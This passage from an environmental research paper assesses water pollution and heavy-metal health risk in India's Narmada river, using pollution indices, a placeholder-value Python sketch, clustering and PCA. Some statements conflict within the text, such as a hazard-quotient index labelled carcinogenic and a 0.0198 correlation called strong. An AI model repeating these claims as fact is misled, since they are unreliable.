Koteshwar) for the assessment of water pollution in river Narmada. The step-by-step procedure followed in this study is represented in a flow chart, shown in Fig. 1(a). The details of all water sampling locations are given in Table S1 of the supplementary information (SI) and their positions are shown in Fig. 1(b), produced with ArcGIS 10.1 software.

### 2.2. Sample Collection and Analysis

At each sampling location, subsurface water samples were collected from the shore side of river Narmada during the winter season, from November 2017 to March 2018. The samples were collected during the daytime, between 10:00 am and 11:00 am, at each sampling location. The collected composite water samples were filled into airtight, acid-rinsed plastic containers of 500 mL capacity and stored at 4°C without freezing to avoid unpredictable changes before analysis. Three containers were filled with water samples at each location, of which one sample was fixed in biochemical oxygen demand (BOD) bottles for the analysis of BOD5, while two sample containers (to which no fixing reagents were added) were used for the analysis of the other WQ parameters. It is to be noted that parameters such as surface water temperature (WT), dissolved oxygen (DO), pH and electrical conductivity (EC) were analysed at the sampling sites using portable analytical instruments, shown in Table S2 of the SI. The collected water samples were transported to the laboratory within 24 h for further analysis. The analysis of each parameter was carried out through the experimental procedures described by APHA [25]. The experimental procedure for the analysis of the WQ parameters, with their abbreviations, measurement units and standard acceptable limits in drinking water (prescribed as per BIS [26] and WHO [27]), is shown in Table S2 of the SI. Each experiment was carried out in triplicate and the mean value of the observations was used to reduce uncertainty.

### 2.3. Water Quality Indices (WQI)
In this study, the WQIs CPI, HPI, RAI and CRI were used to analyse the overall status of water quality in river Narmada. The indices are described below.

#### NSFWQI

This is the most commonly used WQI for the classification of WQ status in freshwater bodies around the world [19]. It involves parameters such as DO, WT, pH, BOD, faecal coliform, total solids (TS) and turbidity. The mathematical expression (Eq. (1)) used to evaluate NSFWQI is:

##### (1) $NSFWQI = \sum_{i=1}^{p} W_i I_i$

where $W_i$ is the weighting factor of the ith WQ parameter, $p$ is the total number of parameters and $I_i$ is the sub-index value of the ith parameter. The WQ status at sampling locations along river Narmada is classified by the NSFWQI value in the range 0–100: 0–25 (very poor quality); 25–50 (poor quality); 50–70 (medium quality); 70–90 (good quality); and 90–100 (excellent quality).

#### CPI

This index is based on parameters (DO, pH, BOD, EC, COD, alkalinity, turbidity, total dissolved solids (TDS), total hardness (TH) and chloride) whose standard acceptable concentration limits (SAL) in drinking water have been prescribed by BIS [26] and WHO [27]. It has proved to be a trustworthy method for a meaningful classification of the overall WQ status in a freshwater body [28]. The mathematical expressions (Eq. (2) and (3)) used to evaluate CPI are:

##### (2) $PI_i = \dfrac{C_i}{S_i}$

##### (3) $CPI = \dfrac{1}{n} \sum_{i=1}^{n} PI_i$

where $PI_i$ is the sub pollution index of the ith parameter, $S_i$ is the SAL of the ith parameter in drinking water, $C_i$ is the analysed concentration of the ith parameter, and $n$ is the total number of parameters. The WQ status is classified by the CPI value as: 0–0.20 (excellent quality); 0.21–0.40 (good quality); 0.41–1.00 (slightly polluted); 1.01–2.00 (moderately polluted); ≥ 2.01 (severely polluted).

#### HPI

This index is widely used to estimate heavy metal contamination in a water body. HPI is evaluated on the basis of heavy metals whose SAL in drinking water has been prescribed by BIS [26] and WHO [27]. It is a single-factor index that classifies the water contamination and the degree of toxicity contributed by heavy metals in a water body [19, 29]. The mathematical expressions (Eq. (4) and (5)) used to evaluate HPI are:

##### (4) $MI_i = \dfrac{C_i}{S_i}$

##### (5) $HPI = \sqrt{\dfrac{1}{2}\left(MI_{max}^{2} + MI_{average}^{2}\right)}$

where $MI_i$ is the sub-index of the ith heavy metal, $S_i$ is the SAL of the ith metal, and $C_i$ is the concentration of the ith heavy metal. The heavy metal contamination in water is classified by the HPI value as: HPI ≤ 1 (slightly contaminated water); 1–2 (contaminated water); 2–3 (moderately contaminated water); and HPI ≥ 3 (severely contaminated water).

#### RAI

RAI is commonly used to estimate the probable occurrence of human health risk over a particular time period on exposure to hazardous chemicals whose reference dose (RFD) is prescribed in the RAIS database [30]. According to Lee et al. [31], health risk assessment involves the identification of pollutants, the rate of pollutant exposure, the toxicity response dose of the pollutant, and the characterization of the biotic risk due to the pollutant. In this study, RAI was evaluated using the concentration data of all heavy metals at the respective sampling locations. The RAI value can be evaluated by the following mathematical equations (Eq. (6), (7) and (8)):
##### (6) $ADD_i = \dfrac{C_i \times IR \times ED \times EF}{BW \times AT}$

##### (7) $HQ_i = \dfrac{ADD_i}{RFD_i}$

##### (8) $RAI = \sum_{i=1}^{n} HQ_i$

where $ADD_i$ denotes the average daily dose of the ith heavy metal, $RFD_i$ the reference dose of the ith heavy metal, $C_i$ the analysed concentration of the ith heavy metal, ED the exposure duration, EF the exposure frequency, AT the average time, BW the human body weight, IR the ingestion rate and $HQ_i$ the sub-index of the ith heavy metal. The RFD values (as per the RAIS database) of manganese (Mn), copper (Cu), iron (Fe), chromium (Cr), zinc (Zn), arsenic (As), cadmium (Cd), lead (Pb), cobalt (Co) and nickel (Ni) are shown in Table S3 of the SI. The RAI value is classified into two categories: RAI < 1 indicates an acceptable carcinogenic risk and RAI ≥ 1 indicates an unacceptable carcinogenic risk. The risk of cancer here means the probability of a human developing cancer after exposure to the contaminants over a given life period [32].

#### CRI

The probability of cancer risk is determined by the oral slope factor (SFO) of hazardous cancer-causing chemicals. In the RAIS database, SFO values are available for Cr, As, and Pb, shown in Table S3 of the SI. The cancer risk can be expressed mathematically as follows (Eq. (9)):

##### (9) $CRI = ADD_i \times SFO$

The cancer risk value evaluated at a sampling location is classified into two categories: a value ≤ 1×10−6 indicates an acceptable level or very low risk of cancer, meaning that 1 person per 1,000,000 might be prone to cancer as a consequence of the exposure, while a value ≥ 1×10−6 indicates a high risk of cancer [20].

### 2.4. Environmetrics Techniques

The environmetric statistical analysis of the heavy metal concentration datasets was performed through HCA and PCA, using SPSS version 16.0 software. HCA based on the Ward method was used to group sampling locations with similar pollution loads into clusters. PCA was used to classify the trend of metal contamination and to predict the input sources of contaminants in the river.

### 3. Results and Discussion

The physicochemical and biological characteristics of the water in river Narmada were assessed at 23 sampling locations (R1–R23) during the winter season (November 2017 to March 2018). The data on water quality parameters and heavy metal concentrations obtained during laboratory analysis of the collected water samples at sampling locations R1–R23 are shown in Tables S4 and S5 of the SI, respectively, in terms of the mean and standard deviation of triplicate observations. The analysed values of WT, TDS, and DO were in the ranges 21°C–26°C (R4), 24–442 mg/L, and 5.7–8.5 mg/L, respectively, at all sampling locations, which is within the SAL. The pH values of the water samples were in the range 7.1–8.8, indicating the slightly alkaline character of river Narmada, possibly due to the presence of carbonates and bicarbonates of magnesium and calcium in the water. The pH value was within the SAL (6.5–7.5) at locations R14, R15, R16, and R22, while it was unacceptable (pH > 7.5) at the other locations. The EC value at locations R1, R2, R3, and R4 was > 600 μS/cm, which indicates the presence of salts and inorganic materials in the water. The maximum alkalinity concentration of 227 mg/L (> SAL of 200 mg/L) was found at location R16, while it was within the SAL at the other locations, indicating the presence of carbonates, bicarbonates, and hydroxides in the water.
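As an illustration of how the indices in Eq. (2)–(9) are assembled, a minimal sketch for a single hypothetical location follows. Every concentration, limit, reference dose and slope factor shown is a placeholder for illustration only, not a value used in this study; real SAL, RFD and SFO values come from BIS/WHO and the RAIS database.

```python
# Illustrative sketch of Eq. (2)-(9) for one sampling location.
# All numeric values are invented placeholders.
import numpy as np

# --- CPI (Eq. 2-3): physicochemical parameters vs. standard acceptable limits
conc = {"BOD": 6.0, "COD": 35.0, "TDS": 180.0, "TH": 250.0}   # mg/L (example)
sal  = {"BOD": 5.0, "COD": 20.0, "TDS": 500.0, "TH": 200.0}   # mg/L (example)
pi   = {k: conc[k] / sal[k] for k in conc}                     # sub pollution indices
cpi  = sum(pi.values()) / len(pi)

# --- HPI (Eq. 4-5): per-metal sub-indices, then max/average aggregation
metal_conc = {"Cu": 80.0, "Pb": 12.0, "Zn": 25.0}              # ug/L (example)
metal_sal  = {"Cu": 50.0, "Pb": 10.0, "Zn": 3000.0}            # ug/L (example)
mi  = np.array([metal_conc[m] / metal_sal[m] for m in metal_conc])
hpi = np.sqrt(0.5 * (mi.max() ** 2 + mi.mean() ** 2))

# --- RAI (Eq. 6-8) and cancer risk (Eq. 9) via the average daily dose
IR, ED, EF, BW, AT = 2.0, 70.0, 365.0, 70.0, 70.0 * 365.0      # example exposure assumptions
rfd = {"Cu": 0.04, "Pb": 0.0035, "Zn": 0.3}                    # mg/kg/day (example)
sfo = {"Pb": 0.0085}                                            # oral slope factor (example)

add = {m: (metal_conc[m] / 1000.0) * IR * ED * EF / (BW * AT)   # mg/kg/day
       for m in metal_conc}
rai = sum(add[m] / rfd[m] for m in add)                         # sum of hazard quotients
cancer_risk = {m: add[m] * sfo[m] for m in sfo}

print(f"CPI={cpi:.2f}  HPI={hpi:.2f}  RAI={rai:.2f}  cancer risk={cancer_risk}")
```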
High values of alkalinity might be due to excessive input of organic waste enriched wastewater from agricultural and domestic area [11]. Comparative analysis of TDS and TS concentration reveals that the locations R8, R12, R14, R16, and R19 are significantly affected by high load of suspended solids (> 100 mg/L) in the water. Considerably, the TH concentration was obtained as 310 mg/L, 400 mg/L, 340 mg/L, and 400 mg/L at locations R12, R13, R16, and R17, respectively which is more than SAL, indicating the presence of chlorides, sulphates, and nitrates of calcium and magnesium in the water. However, the chloride concentration was obtained in range from 13–244 mg/L at all sampling locations, which is within the SAL. The variation in chloride concentration might be due to uncontrolled discharge of sewage and agricultural wastewater in the river Narmada. The turbidity of collected water samples was obtained in range 1.1–15 NTU (above SAL of 1 NTU) at all sampling locations. In another analysis, the BOD concentration was found to be acceptable at locations R15, R18, R19, R20, R21,and R23, while at other locations, it was more than SAL (5 mg/L), indicating high organic loading in the river. Consequently, the COD concentration was obtained as 9 ± 0.01 mg/L and 13 ± 0.01 mg/L at locations R21and R23, respectively which is acceptable as per SAL (20 mg/L COD), while at other locations, the higher concentration of COD (> 20 mg/L of SAL) indicates the heavy load of organic and inorganic pollutants. Moreover, as per BIS 2012, the faecal coliform should not be detected in 100 mL drinking water sample. In this study, the biological analysis of water samples indicates the presence of faecal coliform falling in the range of 1.1–8.9 MPN/100 mL (permissible faecal coliform ≤ 50). In the available literature, Sharma et al. [11] have elaborately reported the physiochemical characteristic of water along the stretch of river Narmada and analysed the data through PCA technique. They have reported that the parameters like total alkalinity, COD, TDS, TH, and chloride of water in winter season varied in ranges from 26 to 71 mg/L, 5.1–13.4 mg/L, 698–1,585 mg/L, 70.25 to 131.2 mg/L, and 21.2 to 66 mg/L, respectively. Compared to these reported data, the variation in concentration of these parameters has increased significantly in this study due to excessive input of wastewater in river Narmada, in recent past years. Based on the comparative analysis of these physicochemical and biological parameters to SAL, it is revealed that the WQ of river Narmada is not suitable for drinking purposes and requires prior treatment for further use. The heavy metal concentration was investigated in the collected water samples at all sampling locations. Compared to SAL, the concentration of Cu was found to be higher (> 50 μg/L SAL) at locations R1 to R11, Pb was found to be higher (> 10 μg/L SAL) at R1 to R4, and Mn was found to be higher (> 100 μg/L SAL) at R23, while other heavy metals were found within their SAL at all sampling locations. The major heavy metal contamination was observed at the initial sampling locations (R1–R10), which lies in the industrial zone of M.P. The heavy metal concentration data obtained at all sampling locations were used to evaluate their mean and median value of data that represent the overall metal concentration in river Narmada along the stretch of M.P. The variation in data of heavy metals at the overall sampling locations is represented as box and whiskers plot shown in Fig. 1(c). 
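The summary statistics underlying such a box-and-whiskers view can be reproduced in a few lines; the sketch below uses invented concentrations purely to illustrate the computation (the study's own data are in Table S5 of the SI).

```python
# Sketch of the summary statistics behind a box-and-whiskers plot such as
# Fig. 1(c), assuming one row per sampling location (values are invented).
import pandas as pd

metals = pd.DataFrame({
    "Cu": [95, 88, 120, 60, 45], "Fe": [50, 62, 58, 40, 70],
    "Zn": [30, 22, 18, 25, 20],  "Pb": [14, 12, 9, 6, 4],
})  # ug/L (example)

summary = metals.describe().T[["mean", "50%", "min", "max"]]
summary = summary.rename(columns={"50%": "median"})
print(summary.sort_values("mean", ascending=False))  # relative abundance ordering
```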
Although, Fe concentration in the river water is found within SAL, it is due to variation in Fe concentration from various natural sources (i.e., runoff from weathering rock area in the catchments). Considerably, there is variation in concentration of Cu, Zn, and Pb, which indicates the input of untreated industrial wastewater in the river while other metals are close to their mean value. The comparative analysis of its concentration in the river reveals that Cu is the most abundant heavy metal found, followed by others- Fe > Zn > Mn > Pb > Cr > Ni > As > Cd > Co (Fig. 1(d)). Based on the above analysis, it was found that the river water is in the polluted categories and therefore, it is not suitable for drinking as per BIS [26] and WHO [27] water quality standard. However, to draw meaningful information, it is required to classify the overall water pollution status at respective sampling locations in the river. ### 3.1. Water Quality Index Results In this study, the indices like NSFWQI, CPI, and HPI are evaluated to classify the status of water pollution at the sampling locations in river Narmada, the indices data are shown in Table 1. The NSFWQI result reveals that the water pollution at sampling location (R1–R4, R6–R8, R13, R16, R17, and R23) falls under medium range (50–70), while it is good at other locations. Although, NSFWQI is evaluated on the basis of limited WQ parameters, thus it gives a predictable status of WQ [19]. Further, it is to be noted that there is no single standard WQI reported yet, which could be universally applied to assess the WQ in a water body. In the recent trend, the CPI is one of the most trustworthy acceptable WQI commonly used to classify the accurate water pollution status in a water body, which is based on SAL value of physicochemical parameters [28]. The CPI was evaluated at all sampling locations, which indicates severely polluted water quality at sampling locations R1–R4, R6–R8, R13 and R14, moderately polluted water quality at R5, R9–R12, R15–R18, R21 and R23, while slightly polluted water quality at the other locations, as shown in Fig. 2(a). The average CPI value of 1.98 was evaluated for water quality in river Narmada, which indicates the moderately polluted water quality that is not suitable for drinking purposes. Among all sampling locations, the highest CPI value of 7.52 was evaluated at location R1 (origin site of the river), which was found to be most affected due to heavy load of pollutants. River Narmada receives more pollution load near its origin, which considerably degrades the natural quality of water. The comparative analysis of NSFWQI and CPI results reveals almost similar trend in variation of WQ at all sampling locations (Fig. 2(c)). Thus, NSFWQI and CPI could be used to predict satisfactory and acceptable WQ trends in a water body. However, both indices do not involve the concentration data of heavy metals to classify the metal contamination in a water body [28]. To assess the heavy metal contamination in the water of river Narmada, HPI was evaluated using heavy metal concentration data obtained during laboratory analysis and their respective SAL value. The water quality at sampling locations R1–R4 was found to be severely contaminated (HPI value > 3) due to heavy metals, which reveals that it is not suitable for drinking purposes as shown in Fig. 2(b). 
However, the metal contamination in the river decreases towards the downstream sampling locations from contaminated (R5–R7) to slightly contaminated (R11–R22) status, which might be due to sedimentation of metals and reduced input of metal carrying wastewater in the river. Also, the sampling locations R11–R22 lies in the forest cover area, which supports the bio-accumulation of heavy metals, and thus reduces metal contamination [12]. The water quality at sampling location R23 lies in mining area and is found to be moderately contaminated, which could be due to its geomorphologic location and high input of Fe and Mn carrying runoff entering the river from surrounding rock weathering areas [33]. The average NSFWQI, CPI, and HPI values of river Narmada were evaluated to be 70.35, 1.98, and 1.35 respectively, which reveals that the river water is moderately polluted and not suitable for drinking purposes. Moreover, due to the presence of toxic heavy metals in the river water, RAI was evaluated to assess the biotic risk to human health if water is used for drinking purposes. The RAI is based on RFD (obtained from RAIS database) and ADD values of heavy metals, which was evaluated on basis of heavy metal concentration data obtained during laboratory analysis of the water samples at all sampling locations shown in Table 2. The RAI result indicates an unacceptable biotic risk or cancer risk to human health if water is lifelong regularly used for drinking purposes in the vicinity of the river stretch without prior treatment. Furthermore, the occurrence of cancer risk to human health was verified by the evaluation of cancer risk value, which was based on ADD and SFO value of heavy metals. In this study, the SFO value of Cr, As, and Pb were found in the RAIS database. Considerably, a cancer risk value > 1×10−6 was obtained at all sampling locations shown in Table 2, which indicates the certainty of cancer risk to human health. ### 3.2. Hierarchical Cluster Analysis Result The clustering of water sampling locations on the basis of similarity and dissimilarity of heavy metal contamination was carried out using HCA through Ward method based on the dataset of heavy metals obtained during laboratory analysis. In this study, the agglomeration schedule in HCA gained two clusters, which is represented as dendrogram in Fig. 3(a). The cluster 1 contains sampling locations R1, R2, R5, R9, R13, R12, R14, R15, R18, and R19, while cluster 2 contains other sampling locations. Considerably, the sampling locations R15, R19, R12, and R5 were found in both clusters, which could be due to the impact of their geomorphologic position and heavy metal input from both point and no-point sources. The first cluster signifies the input of heavy metals in the river water mainly from the anthropogenic sources, while cluster two indicates the heavy metal contamination due to both anthropogenic and natural sources [19]. Most of the sampling locations of downstream regions were grouped in second cluster that confirms the input of heavy metals through runoff from forest cover and agricultural area. ### 3.3. Inter-Metal Relationships in River Narmada In order to classify the pathway and input source of heavy metals in the river water, Pearson correlation coefficient analysis was performed using heavy metal concentration data shown in Table 3. 
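A minimal sketch of this environmetrics workflow (Pearson correlations, Ward clustering and PCA) is given below with random placeholder data in place of the measured concentrations; the study itself used SPSS 16.0 with varimax rotation, which this unrotated sketch does not reproduce.

```python
# Sketch of the correlation / HCA / PCA workflow on a locations x metals table.
# The data are random placeholders, not the study's measurements.
import numpy as np
import pandas as pd
from scipy.cluster.hierarchy import linkage, fcluster
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler

rng = np.random.default_rng(1)
metals = pd.DataFrame(rng.random((23, 10)),
                      index=[f"R{i}" for i in range(1, 24)],
                      columns=["Cr", "Mn", "Fe", "Cu", "Zn",
                               "As", "Cd", "Pb", "Co", "Ni"])

# Pearson correlation matrix (counterpart of Table 3)
corr = metals.corr(method="pearson")

# Ward hierarchical clustering of sampling locations into two clusters
Z = linkage(StandardScaler().fit_transform(metals), method="ward")
clusters = fcluster(Z, t=2, criterion="maxclust")

# PCA on standardized concentrations; loadings correspond to a component table
pca = PCA(n_components=3)
pca.fit(StandardScaler().fit_transform(metals))
loadings = pd.DataFrame(pca.components_.T, index=metals.columns,
                        columns=["PC1", "PC2", "PC3"])

print(corr.round(2).iloc[:4, :4])
print("cluster sizes:", np.bincount(clusters)[1:])
print("explained variance ratio:", pca.explained_variance_ratio_.round(2))
print(loadings.round(2))
```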
It can be clearly observed that the Cu has strongest correlation coefficient with Pb and Zn to be 0.998, and 0.986 respectively, which indicate the input of wastewater from electroplating industries [8, 34]. The strong positive correlation coefficient between Cr-As of 0.932, and Cr-Fe of 0.873 indicates the input of agricultural wastewater through runoff into the river. In addition, the Cr-Ni has gained a strong positive correlation coefficient of 0.914, which indicates the input of mining industrial wastewater into the river [35]. The heavy metal Mn has strong correlation with Fe, As, and Ni of 0.4, 0.163, and 0.0198 respectively, which confirms its input in the river from natural mining sites and mountainous agricultural runoff. River Narmada flows through basaltic rock mountainous region in the peninsular part of India [7]. Hence, the input of Cr, Mn and Fe are commonly added to the river water through runoff from those mountainous areas. These heavy metals are commonly extracted from their ores in mountainous regions [35]. The strong positive correlation between Zn-Pb, and Zn-Co of 0.981, and 0.842, respectively indicates their input source as runoff sediment from natural rock weathering areas. The positive correlation coefficient of 0.462 is found between Cd-As, which are common heavy metals used by fertilizer industries, which give rise to the input of agricultural runoff into the river. The positive correlation coefficient between heavy metals demonstrates their actual characteristics, mutual dependency and common input source. Moreover, it is revealed that the river Narmada receives metal-contaminated wastewater from both anthropogenic and natural sources. ### 3.4. Principal Component Analysis Result To validate the relationship between heavy metals, in order to extract trustworthy information and to ensure their input source, PCA was carried out using heavy metal concentration data through varimax normalized rotation method. Primarily, in order to estimate the number of components during PCA, scree plot of heavy metal datasets was constructed, as shown in Fig. 3(b). From the scree plot, the major break could be observed after the second component, which indicates that the first two components could produce more meaningful information [18]. The component eigen value curve in scree plot has dropped after the third component, which indicates that the third component might be useful for better interpretation of the datasets. Thereafter, Kaiser–Meyer–Olkin (KMO) and Bartlett’s test of data was executed before performing the component analysis. The KMO sampling adequacy was obtained as 0.664 with Bartlett’s test of sphericity (approx. Chi-Square:413.750; degree of freedom: 45; statistical significance: 0.0), which indicates the suitability of the datasets for PCA. The present study reveals that there is no improvement in the WQ of river Narmada in sampling years 2017–18, as the CPI value > 2 (poor WQ) was obtained at most of the sampling locations. The river water is polluted due to input of untreated/partially treated wastewater from industrial and domestic sectors. The present result is supported by Gupta et al. [7], who reported the poor WQ in the river and its unsuitability for human consumption. Jain et al. [15] examined metal fractions on bed sediment of river Narmada and reported that the heavy metals (like Mn, Cu, Ni, Cr, Pb, Zn, and Cd) concentrations in sediments were higher than their standard shale values. 
They suggested that anthropogenic activities, soil erosion, and agricultural runoff were the major sources of pollution in river Narmada. In the current scenario, the biotic risk due to the imbalanced concentration of heavy metals in the river still exists, as HPI > 3 was obtained in this study at the sampling locations (R1, R2, R3, and R4) near the river origin. Hence, it is necessary to review the existing conservation plan so as to include regular monitoring and treatment strategies for the wastewater entering the river, which will improve the assimilative capacity of the river. A comparative analysis of the average heavy metal concentrations dissolved in river Narmada (estimated in this study) with the averages of other Indian rivers is given in Table 5. Based on the analysis of the heavy metal data (shown in Table 5), the average Cu concentration in river Narmada is higher than that of most Indian rivers except the rivers Ganga, Sabarmati, and Damodar, while the estimated average concentrations of the other dissolved heavy metals in this study are comparatively lower than most of the Indian river averages. Although heavy metal contamination in river Narmada is lower than the average heavy metal concentrations in other Indian rivers, the present study reveals that the river water is moderately contaminated and not suitable for drinking purposes. Therefore, it is suggested that remedial measures should be considered, including prevention or strict control of the discharge of untreated/partially treated wastewater into the river, proper treatment of industrial wastewater, regular monitoring of water quality, diversion of drains, and the construction of bunds or buffer strips to check agricultural runoff. This would improve the self-assimilative capacity and ecological health of river Narmada.

### 4. Conclusions

The physicochemical and biological characteristics of the WQ in river Narmada have been assessed at 23 different sampling locations along the stretch of the river. The overall water pollution status in the river was evaluated using NSFWQI, CPI and HPI. The average NSFWQI, CPI, and HPI of the river were evaluated to be 70.35, 1.98, and 1.35, respectively, which reveals that the river water is moderately polluted and not suitable for drinking purposes. Furthermore, the probability of a cancer risk to human health on exposure to the river water was evaluated using RAI and CRI. Notably, RAI and CRI values above their acceptable limits signify a high probability of cancer risk due to the high concentrations of copper (Cu > 50 μg/L), lead (Pb > 10 μg/L) and manganese (Mn > 100 μg/L). The relative abundance of average heavy metal concentrations in the river was obtained as Cu > Fe > Zn > Mn > Pb > Cr > Ni > As > Cd > Co. Based on heavy metal contamination, the sampling locations fall into two clusters in the hierarchical cluster analysis. The metal relationships between Cu-Pb and Zn-Cu gained high Pearson correlation coefficients of 0.998 and 0.986, respectively, which indicates the input of metal-carrying untreated/partially treated wastewater into the river from electroplating industries. Further, PCA produced three PCs, and all the heavy metals were positively loaded in PC2, which confirmed their input into river Narmada from natural and anthropogenic sources. Therefore, it is suggested that the river water must be treated before being used for drinking purposes to avoid unpredictable risks to human health.
This study provides the future direction to the researchers, environmentalists and water resources planners and managers to take necessary action to maintain the aesthetic value of the rivers and further protract aquatic biodiversity. ### Acknowledgment The author are highly thankful to Amrish Kumar (DPPE, IITR, India) and Vivek Kumar (DPPE, IITR, India) who helped in laboratory testing of water samples and provided raw data for further analysis. ### Notes Author Contributions S.M. (Postdoc fellow) and A.K. (Associate Professor) generated the concept followed by discussion and article preparation. Both authors contributed equally in completing the article. ### References 1. Eliku T, Leta S. Spatial and seasonal variation in physicochemical parameters and heavy metals in Awash River, Ethiopia. App Water Sci. 2018;8:177 2. Pradhan S, Kumar P, Mehrotra I. River pollution: Assessment of hydro-philic and phobic nature of persistent organic contaminants. Environ Nanotech Monit Manag. 2015;3:47–54. 3. Sharma BM, Becanova J, Martin S, et al. Health and ecological risk assessment of emerging contaminants (pharmaceuticals, personal care products, and artificial sweeteners) in surface and groundwater (drinking water) in the Ganges River Basin, India. Sci Total Environ. 2019;646:1459–1467. 4. Sharma S, Dixit S, Jain P, Shah KW, Vishwakarma R. Statistical evaluation of hydrobiological parameters of Narmada River water at Hoshangabad City, India. Environ Monit Assess. 2008;143:195–202. 5. Yadav NS, Sharma MP, Kumar A. Ecological Health Assessment of Chambal River, India. J Mater Env Sci. 2015;6(3)613–618. 6. Mishra S, Sharma MP, Kumar A. Pollution characteristic and health risk assessment of toxic chemicals of surface water in Surha Lake, India. J Mat Environ Sci. 2016b;7:799–807. 7. Gupta N, Pandey P, Hussain J. Effect of physicochemical and biological parameters on the quality of river water of Narmada, Madhya Pradesh, India. Water Sci. 2017;31:11–23. 8. Chen Q, Lu Z, Yan D, Qi W, Xin S. Source analysis and health risk of heavy metals in the different seasons from Taizihe River, China. Acta Ecolo Sinica. 2018;40:64–71. 9. Singh V, Sharma MP, Sharma S, Mishra S. Bio-assessment of River Ujh using benthic macro-invertebrates as bioindicators, India. Int J River Basin Manag. 2019;17:79–87. 10. Gour S, Jaloree S, Gour M. Water Quality Assessment using Association Rule Mining for River Narmada. Indian J Sci Tech. 2016;9:1–5. 11. Sharma A, Bora CR, Shukla V. Evaluation of Seasonal Changes in Physico-chemical and Bacteriological Characteristics of Water from the Narmada River (India) Using Multivariate Analysis. Nat Resour Res. 2013;22:283–296. 12. Gupta H, Chakrapani GJ. Temporal and spatial variations in water flow and sediment load in Narmada River Basin, India: natural and man-made factors. Environ Geol. 2005;4–5:579–589. 13. Malviya P, Dwivedi AK. Physico-chemical parameters of Narmada River Water: A review. Int J Chem Stud. 2015;3:1–4. 14. Katakwar M. Narmada river water: Pollution and its impact on the human health. Int J Chem Stud. 2016;4:66–70. 15. Jain CK, Gupta H, Chakrapani GJ. Enrichment and fractionation of heavy metals in bed sediments of River Narmada, India. Environ Monit Assess. 2008;141:35–47. 16. Bilgin A. Evaluation of surface water quality by using Canadian Council of Ministers of the Environment Water Quality Index (CCME WQI) method and discriminant analysis method: a case study of Coruh River Basin. Environ Monit Assess. 2018;190:554 17. Zhang L. 
Big Data, Knowledge Mapping for Sustainable Development A Water Quality Index Case Study. Emerg Sci J. 2019;3:249–254. 18. Tripathi M, Singal SK. Use of Principal Component Analysis for parameter selection for development of a novel Water Quality Index: A case study of river Ganga India. Ecol Indicat. 2019;96:430–436. 19. Mishra S, Kumar A, Shukla P. Study of Water Quality in Hindon River Using Pollution Index and Environmetrics, India. Desalin Water Treat. 2015;56(3)1–10. 20. Wongsasuluk P, Chotpantarat S, Siriwong W, Robson M. Heavy metal contamination and human health risk assessment in drinking water from shallow groundwater wells in an agricultural area in Ubon Ratchathani province, Thailand. Environ Geochem Health. 2014;36:169–182. 21. Singh KR, Dutta R, Kalamdhad AS, Kumar B. Risk characterization and surface water quality assessment of Manas River, Assam (India) with an emphasis on the TOPSIS method of multiobjective decision making. Environ Earth Sci. 2018;77:780–785. 22. Xiao J, Wang L, Deng L, Jin Z. Characteristics, sources, water quality and health risk assessment of trace elements in river water and well water in the Chinese Loess Plateau. Sci Total Environ. 2019;650:2004–2012. 23. Yilma M, Kiflie Z, Windsperger A, Gessese N. Assessment and interpretation of river water quality in Little Akaki River using multivariate statistical techniques. Int J Environ Sci Tech. 2018;16:3707–3720. 24. Hamil S, Arab S, Chaffai A, Baha M, Arab A. Assessment of surface water quality using multivariate statistical analysis techniques: a case study from Ghrib dam, Algeria. Arab J Geosci. 2018;11:754–761. 25. American Public Health Association (APHA). AWWA and WPCF Standard Methods for the Examination of Waters and Waste Waters. 22nd ed.Washington DC: 2011. 26. Bureau of Indian Standards (BIS: 10500). Indian standard specification for drinking water. Second Revision. New Delhi: 2012. 27. Guidelines for drinking-water quality: fourth edition incorporating the first addendum. Geneva: World Health Organization (WHO); 2017. Licence: CC BY-NC-SA 3.0 IGO978-92-4-154995-0 28. Chaudhary M, Mishra S, Kumar A. Estimation of water pollution and probability of health risk due to imbalanced nutrients in River Ganga, India. Int J River Basin Manag. 2017;15:53–60. 29. Yang CL, Guo RP, Yue QL, Zhou K, Wu ZF. Environmental quality assessment and spatial pattern of potentially toxic elements in soils of Guangdong province, China. Environ Earth Sci. 2013;70:1903–1910. 30. The Risk Assessment Information System. Chemical toxicity values (RAIS database). [cited 18 December 2018]. Available from: https://rais.ornl.gov/cgi-bin/tools/TOX_search?select=chemmeta 31. Lee JS, Chon HT, Kim KW. Human risk assessment of As, Cd, Cu and Zn in the abandoned metal mine site. Environ Geochem Health. 2005;27:185–191. 32. Adamu CI, Nganje TN, Edet A. Heavy metal contamination and health risk assessment associated with abandoned barite mines in Cross River State, south eastern Nigeria. Environ Nanotech Monit Manag. 2015;3:10–21. 33. Gupta H, Chakrapani GJ. Temporal and spatial variations in water flow and sediment load in the Narmada River. Current Sci. 2007;92:679–684. 34. Liu J, Zhang XH, Tran H, Wang DQ, Zhu YN. Heavy metal contamination and risk assessment in water, paddy soil, and rice around an electroplating plant. Environ Sci Poll Res. 2011;18:1623–1632. 35. Qu B, Zhang Y, Kang S, Sillanpaa M. Water quality in the Tibetan Plateau: Major ions and trace elements in rivers of the “Water Tower of Asia”. Sci Total Environ. 
2019;649:571–581. 36. Dutta S, Dwivedi A, Kumar MS. Use of water quality index and multivariate statistical techniques for the assessment of spatial variations in water quality of a small river. Environ Monit Assess. 2018;190:718–724. 37. Rajkumar H, Naik PK, Rishi MS. Evaluation of heavy metal contamination in soil using geochemical indexing approaches and Chemometric Techniques. Int J Environ Sci Tech. 2018;16:7467–7486. 38. Kumar RN, Solanki R, Kumar JIN. Seasonal variation in heavy metal contamination in water and sediments of river Sabarmati and Kharicut canal at Ahmedabad, Gujarat. Environ Monit Assess. 2013;185:359–368. 39. Giri S, Singh AK. Risk assessment, statistical source identification and seasonal fluctuation of dissolved metals in the Subarnarekha River, India. J Hazard Mat. 2014;265:305–314. 40. Sundaray SK, Nayak BB, Kanungo TK, Bhatta D. Dynamics and quantification of dissolved heavy metals in the Mahanadi river estuarine system, India. Environ Monit Assess. 2012;184:1157–1179. 41. Prasad MBK, Ramanathan AL, Shrivastav SK, Anshumali , Sexena R. Metal fractionation studies in surfacial and core sediments in the Achankovil river basin in India. Environ Monit Assess. 2006;121:77–102. 42. Chatterjee SK, Bhattacharjee I, Chandra G. Water quality assessment near an industrial site of Damodar River. India. Environ Monit Assess. 2010;161:177–189. 43. Singh VK, Singh KP, Mohan D. Status of heavy metals in water and bed sediments of river Gomti – a tributary of the Ganga River, India. Environ Monit Assess. 2005;105:43–67. 44. Sundaray SK. Application of multivariate statistical techniques in hydrogeochemical studies—a case study: Brahmani–Koel River (India). Environ Monit Assess. 2010;164:297–310. 45. Jain 